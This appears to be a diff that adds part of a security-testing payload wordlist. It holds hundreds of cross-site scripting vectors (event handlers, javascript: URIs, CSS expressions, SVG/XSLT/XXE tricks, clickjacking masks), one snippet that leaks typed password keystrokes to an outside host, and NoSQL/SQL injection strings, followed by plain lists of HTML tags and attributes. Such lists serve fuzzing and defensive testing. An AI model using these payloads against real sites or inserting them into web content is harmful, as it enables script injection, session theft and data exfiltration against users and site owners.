<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
|
|
573
|
+
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
|
|
574
|
+
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
|
|
575
|
+
<style>@import "data:,*%7bx:expression(write(1))%7D";</style>
|
|
576
|
+
<frameset onload=alert(1)>
|
|
577
|
+
<table background="javascript:alert(1)"></table>
|
|
578
|
+
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
|
|
579
|
+
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
|
|
580
|
+
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
|
581
|
+
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
|
|
582
|
+
<!--<img src="--><img src=x onerror=alert(1)//">
|
|
583
|
+
<comment><img src="</comment><img src=x onerror=alert(1)//">
|
|
584
|
+
<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
|
|
585
|
+
<style><img src="</style><img src=x onerror=alert(1)//">
|
|
586
|
+
<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
|
|
587
|
+
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
|
|
588
|
+
<?xml version="1.0" standalone="no"?><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head><body>Hello</body></html>
|
|
589
|
+
<style>*[{}@import'test.css?]{color: green;}</style>X
|
|
590
|
+
<div style="font-family:'foo[a];color:red;';">XXX</div>
|
|
591
|
+
<div style="font-family:foo}color=red;">XXX</div>
|
|
592
|
+
<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
|
|
593
|
+
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
|
|
594
|
+
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
|
595
|
+
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
|
596
|
+
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
|
|
597
|
+
<x style="behavior:url(test.sct)">
|
|
598
|
+
<xml id="xss" src="test.htc"></xml><label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
|
599
|
+
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
|
|
600
|
+
<video><source onerror="alert(1)">
|
|
601
|
+
<video onerror="alert(1)"><source></source></video>
|
|
602
|
+
<b <script>alert(1)//</script>0</script></b>
|
|
603
|
+
<b><script<b></b><alert(1)</script </b></b>
|
|
604
|
+
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
|
605
|
+
<div style="[a]color[b]:[c]red">XXX</div>
|
|
606
|
+
<div style="\63	\06f
\0006c\00006F
\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \ or:blue;">XXX</div>
|
|
607
|
+
<!-- IE 6-8 --><x '="foo"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '="foo"><x foo='><img src=x onerror=alert(2)//'><? '="foo"><x foo='><img src=x onerror=alert(3)//'>
|
|
608
|
+
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF<img src="javascript:alert(2)"><image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
|
|
609
|
+
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
|
|
610
|
+
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
|
|
611
|
+
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?><root/>
|
|
612
|
+
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)">]><img />
|
|
613
|
+
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x></doc>
|
|
614
|
+
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
|
|
615
|
+
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
|
|
616
|
+
<// style=x:expression\28write(1)\29>
|
|
617
|
+
<form><button formaction="javascript:alert(1)">X</button>
|
|
618
|
+
<event-source src="event.php" onload="alert(1)">
|
|
619
|
+
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
|
|
620
|
+
<script<{alert(1)}/></script </>
|
|
621
|
+
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
|
|
622
|
+
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
|
|
623
|
+
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
|
|
624
|
+
<object allowscriptaccess="always" data="test.swf"></object>
|
|
625
|
+
<style>*{x:expression(write(1))}</style>
|
|
626
|
+
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
|
|
627
|
+
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
|
|
628
|
+
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
|
|
629
|
+
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
|
|
630
|
+
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
|
|
631
|
+
<body oninput=alert(1)><input autofocus>
|
|
632
|
+
<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a></svg>
|
|
633
|
+
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><animation xlink:href="javascript:alert(1)"/><animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"/><foreignObject xlink:href="javascript:alert(1)"/><foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E"/></svg>
|
|
634
|
+
<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/><animate attributeName="onunload" to="alert(1)"/></svg>
|
|
635
|
+
<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style="background:url(test5.svg)">PRESS ENTER</div>
|
|
636
|
+
[A]<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>">[B]<? foo="><x foo='?><script>alert(1)</script>'>">[C]<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">[D]<% foo><x foo="%><script>alert(1)</script>">
|
|
637
|
+
<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
|
|
638
|
+
<div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
|
|
639
|
+
<svg xmlns="http://www.w3.org/2000/svg"><handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler></svg>
|
|
640
|
+
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage></svg>
|
|
641
|
+
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe><iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
|
|
642
|
+
<!-- IE 5-9 --><div id=d><x xmlns="><iframe onload=alert(1)"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>
|
|
643
|
+
<div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div><script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
|
644
|
+
XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!--*{color:red} /* all UA */*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */</style>
|
|
645
|
+
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
|
|
646
|
+
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
|
|
647
|
+
<img src="x` `<script>alert(1)</script>"` `>
|
|
648
|
+
<script>history.pushState(0,0,'/i/am/somewhere_else');</script>
|
|
649
|
+
<svg xmlns="http://www.w3.org/2000/svg" id="foo"><x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/></svg>
|
|
650
|
+
<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
|
|
651
|
+
<img src onerror /" '"= alt=alert(1)//">
|
|
652
|
+
<title onpropertychange=alert(1)></title><title title=></title>
|
|
653
|
+
<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"><?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
|
|
654
|
+
<svg xmlns="http://www.w3.org/2000/svg"><a id="x"><rect fill="white" width="1000" height="1000"/></a><rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/></svg>
|
|
655
|
+
<svg xmlns="http://www.w3.org/2000/svg"><path d="M0,0" style="marker-start:url(test4.svg#a)"/></svg>
|
|
656
|
+
<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
|
|
657
|
+
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
|
|
658
|
+
<div id="x">XXX</div><style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>
|
|
659
|
+
<x style="background:url('x[a];color:red;/*')">XXX</x>
|
|
660
|
+
<!--[if]><script>alert(1)</script --><!--[if<img src=x onerror=alert(2)//]> -->
|
|
661
|
+
<div id="x">x</div><xml:namespace prefix="t"><import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
|
|
662
|
+
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe></a>
|
|
663
|
+
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1></div><iframe src="http://www.example.org/dropHere.html"></iframe>
|
|
664
|
+
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe><textarea type="text" cols="50" rows="10"></textarea>
|
|
665
|
+
<script>function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); }}</script><body><a href="#" onclick="makePopups()">Spam</a>
|
|
666
|
+
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:svg="http://www.w3.org/2000/svg"><body style="background:gray"><iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/><svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body></html>
|
|
667
|
+
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
|
|
668
|
+
<span class=foo>Some text</span><a class=bar href="http://www.example.org">www.example.org</a><script src="http://code.jquery.com/jquery-1.4.4.js"></script><script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>
|
|
669
|
+
<script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10<script src="\\example.com\foo.js"></script> // Safari 5.0
|
|
670
|
+
<?xml version="1.0"?><?xml-stylesheet type="text/xml" href="#stylesheet"?><!DOCTYPE doc [<!ATTLIST xsl:stylesheet id ID #REQUIRED>]><svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle></svg>
|
|
671
|
+
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object><object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
|
672
|
+
<svg xmlns="http://www.w3.org/2000/svg" id="x"><listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/><handler id="y">alert(1)</handler></svg>
|
|
673
|
+
<svg><style><img/src=x onerror=alert(1)// </b>
|
|
674
|
+
<svg><image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'><!--Same effect with<image filter='...'>--></svg>
|
|
675
|
+
<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>
|
|
676
|
+
<b>drag and drop one of the following strings to the drop box:</b><br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b><br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/><div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
|
|
677
|
+
<!doctype html><form><label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label><br><input name="secret" type="password"></form><!-- injection --><svg height="50px"><image xmlns:xlink="http://www.w3.org/1999/xlink"><set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /><set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /><set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /><set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /></image></svg>
|
|
678
|
+
<!-- `<img/src=xx:xx onerror=alert(1)//--!>
|
|
679
|
+
<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>
|
|
680
|
+
<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>
|
|
681
|
+
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
|
|
682
|
+
<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"><circle r="400"></circle><animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /></a>
|
|
683
|
+
<isindex type=image src=1 onerror=alert(1)>
|
|
684
|
+
<isindex action=javascript:alert(1) type=image>
|
|
685
|
+
<object data="javascript:alert(0)">
|
|
686
|
+
<img src=x:alert(alt) onerror=eval(src) alt=0>
|
|
687
|
+
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
|
|
688
|
+
accept
|
|
689
|
+
accept-charset
|
|
690
|
+
accesskey
|
|
691
|
+
action
|
|
692
|
+
align
|
|
693
|
+
alt
|
|
694
|
+
async
|
|
695
|
+
autocomplete
|
|
696
|
+
autofocus
|
|
697
|
+
autoplay
|
|
698
|
+
bgcolor
|
|
699
|
+
border
|
|
700
|
+
challenge
|
|
701
|
+
charset
|
|
702
|
+
checked
|
|
703
|
+
cite
|
|
704
|
+
class
|
|
705
|
+
color
|
|
706
|
+
cols
|
|
707
|
+
colspan
|
|
708
|
+
content
|
|
709
|
+
contenteditable
|
|
710
|
+
contextmenu
|
|
711
|
+
controls
|
|
712
|
+
coords
|
|
713
|
+
data
|
|
714
|
+
data-userdefined-attribute
|
|
715
|
+
datetime
|
|
716
|
+
default
|
|
717
|
+
defer
|
|
718
|
+
dir
|
|
719
|
+
dirname
|
|
720
|
+
disabled
|
|
721
|
+
download
|
|
722
|
+
draggable
|
|
723
|
+
dropzone
|
|
724
|
+
enctype
|
|
725
|
+
for
|
|
726
|
+
form
|
|
727
|
+
formaction
|
|
728
|
+
headers
|
|
729
|
+
height
|
|
730
|
+
hidden
|
|
731
|
+
high
|
|
732
|
+
href
|
|
733
|
+
hreflang
|
|
734
|
+
http-equiv
|
|
735
|
+
id
|
|
736
|
+
ismap
|
|
737
|
+
keytype
|
|
738
|
+
kind
|
|
739
|
+
label
|
|
740
|
+
lang
|
|
741
|
+
list
|
|
742
|
+
loop
|
|
743
|
+
low
|
|
744
|
+
manifest
|
|
745
|
+
max
|
|
746
|
+
maxlength
|
|
747
|
+
media
|
|
748
|
+
method
|
|
749
|
+
min
|
|
750
|
+
multiple
|
|
751
|
+
muted
|
|
752
|
+
name
|
|
753
|
+
novalidate
|
|
754
|
+
open
|
|
755
|
+
optimum
|
|
756
|
+
pattern
|
|
757
|
+
placeholder
|
|
758
|
+
poster
|
|
759
|
+
preload
|
|
760
|
+
readonly
|
|
761
|
+
rel
|
|
762
|
+
required
|
|
763
|
+
reversed
|
|
764
|
+
rows
|
|
765
|
+
rowspan
|
|
766
|
+
sandbox
|
|
767
|
+
scope
|
|
768
|
+
scoped
|
|
769
|
+
selected
|
|
770
|
+
shape
|
|
771
|
+
size
|
|
772
|
+
sizes
|
|
773
|
+
span
|
|
774
|
+
spellcheck
|
|
775
|
+
src
|
|
776
|
+
srcdoc
|
|
777
|
+
srclang
|
|
778
|
+
start
|
|
779
|
+
step
|
|
780
|
+
style
|
|
781
|
+
tabindex
|
|
782
|
+
target
|
|
783
|
+
title
|
|
784
|
+
translate
|
|
785
|
+
type
|
|
786
|
+
usemap
|
|
787
|
+
value
|
|
788
|
+
width
|
|
789
|
+
wrap
|
|
790
|
+
!-- --
|
|
791
|
+
!DOCTYPE
|
|
792
|
+
a
|
|
793
|
+
abbr
|
|
794
|
+
acronym
|
|
795
|
+
address
|
|
796
|
+
applet
|
|
797
|
+
area
|
|
798
|
+
article
|
|
799
|
+
aside
|
|
800
|
+
audio
|
|
801
|
+
b
|
|
802
|
+
base
|
|
803
|
+
basefont
|
|
804
|
+
bdi
|
|
805
|
+
bdo
|
|
806
|
+
big
|
|
807
|
+
blockquote
|
|
808
|
+
body
|
|
809
|
+
br
|
|
810
|
+
button
|
|
811
|
+
canvas
|
|
812
|
+
caption
|
|
813
|
+
center
|
|
814
|
+
code
|
|
815
|
+
col
|
|
816
|
+
colgroup
|
|
817
|
+
datalist
|
|
818
|
+
dd
|
|
819
|
+
del
|
|
820
|
+
details
|
|
821
|
+
dfn
|
|
822
|
+
dialog
|
|
823
|
+
div
|
|
824
|
+
dl
|
|
825
|
+
dt
|
|
826
|
+
em
|
|
827
|
+
embed
|
|
828
|
+
fieldset
|
|
829
|
+
figcaption
|
|
830
|
+
figure
|
|
831
|
+
font
|
|
832
|
+
footer
|
|
833
|
+
frame
|
|
834
|
+
frameset
|
|
835
|
+
h1
|
|
836
|
+
h2
|
|
837
|
+
h3
|
|
838
|
+
h4
|
|
839
|
+
h5
|
|
840
|
+
h6
|
|
841
|
+
head
|
|
842
|
+
header
|
|
843
|
+
hr
|
|
844
|
+
html
|
|
845
|
+
i
|
|
846
|
+
iframe
|
|
847
|
+
img
|
|
848
|
+
input
|
|
849
|
+
ins
|
|
850
|
+
kbd
|
|
851
|
+
keygen
|
|
852
|
+
legend
|
|
853
|
+
li
|
|
854
|
+
link
|
|
855
|
+
main
|
|
856
|
+
map
|
|
857
|
+
mark
|
|
858
|
+
menu
|
|
859
|
+
menuitem
|
|
860
|
+
meta
|
|
861
|
+
meter
|
|
862
|
+
nav
|
|
863
|
+
noframes
|
|
864
|
+
noscript
|
|
865
|
+
object
|
|
866
|
+
ol
|
|
867
|
+
optgroup
|
|
868
|
+
option
|
|
869
|
+
output
|
|
870
|
+
p
|
|
871
|
+
param
|
|
872
|
+
pre
|
|
873
|
+
progress
|
|
874
|
+
q
|
|
875
|
+
rp
|
|
876
|
+
rt
|
|
877
|
+
ruby
|
|
878
|
+
s
|
|
879
|
+
samp
|
|
880
|
+
script
|
|
881
|
+
section
|
|
882
|
+
select
|
|
883
|
+
small
|
|
884
|
+
source
|
|
885
|
+
strike
|
|
886
|
+
strong
|
|
887
|
+
sub
|
|
888
|
+
summary
|
|
889
|
+
sup
|
|
890
|
+
table
|
|
891
|
+
tbody
|
|
892
|
+
td
|
|
893
|
+
textarea
|
|
894
|
+
tfoot
|
|
895
|
+
th
|
|
896
|
+
thead
|
|
897
|
+
time
|
|
898
|
+
tr
|
|
899
|
+
track
|
|
900
|
+
tt
|
|
901
|
+
u
|
|
902
|
+
ul
|
|
903
|
+
var
|
|
904
|
+
video
|
|
905
|
+
wbr
|
|
906
|
+
onbeforeonload
|
|
907
|
+
onhaschange
|
|
908
|
+
onredo
|
|
909
|
+
onundo
|
|
910
|
+
onformchange
|
|
911
|
+
onforminput
|
|
912
|
+
onloadedstart
|
|
913
|
+
function(){ return this.userid}
|
|
914
|
+
' function(){ return this.username} or '1'='1
|
|
915
|
+
function(){return version()}
|
|
916
|
+
function(){return version}
|
|
917
|
+
t'; return this; var d='!
|
|
918
|
+
" function(){ return this} or '1'='1
|
|
919
|
+
t"; return this; var d='!
|
|
920
|
+
' || this || '1'=='1
|
|
921
|
+
' || this.version || '1'=='1
|
|
922
|
+
' || '1'=='1
|
|
923
|
+
''
|
|
924
|
+
""
|
|
925
|
+
'"'
|
|
926
|
+
"''''"'"
|
|
927
|
+
"'"'"''''"
|
|
928
|
+
<foo val=“bar” />
|
|
929
|
+
<foo val=”bar“ />
|
|
930
|
+
<foo val=`bar' />
|